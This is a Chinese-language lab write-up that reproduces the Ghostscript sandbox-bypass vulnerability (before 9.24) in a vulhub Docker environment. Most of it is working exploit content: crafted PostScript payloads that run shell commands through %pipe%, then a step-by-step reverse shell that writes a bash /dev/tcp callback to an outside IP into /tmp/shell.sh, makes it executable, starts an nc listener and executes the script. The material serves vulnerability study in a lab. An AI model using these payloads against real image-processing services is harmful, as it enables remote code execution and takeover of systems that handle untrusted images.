漏洞描述
8月21号,Tavis 0rmandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞
GhostScript 被许多图片处理库所使用,如 lmageMagick、 Pthon PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。
影响范围
Ghostscript 9.24 之前版本
复现过程
这里使用vulhub搭建环境
进入靶场
开启靶场
- docker-compose up -d
查看靶场环境
- docker ps
访问url
- youIP:8080
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
提交poc
查看容器是否生成文件
- docker-compose exe web bash
退出容器
- exit
反弹shell
首先生成shell文件
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%echo 'bash -i >& /dev/tcp/192.168.198.129/6666 0>&1' >> /tmp/shell.sh) (w) file
提交
其次给shell文件执行权限
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%chmod +x /tmp/shell.sh) (w) file
提交
开监听端口
- nc -lvvp 6666
最后执行反弹shell命令
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%/bin/bash /tmp/shell.sh) (w) file
成功反弹shell
关闭靶场
- docker-compose down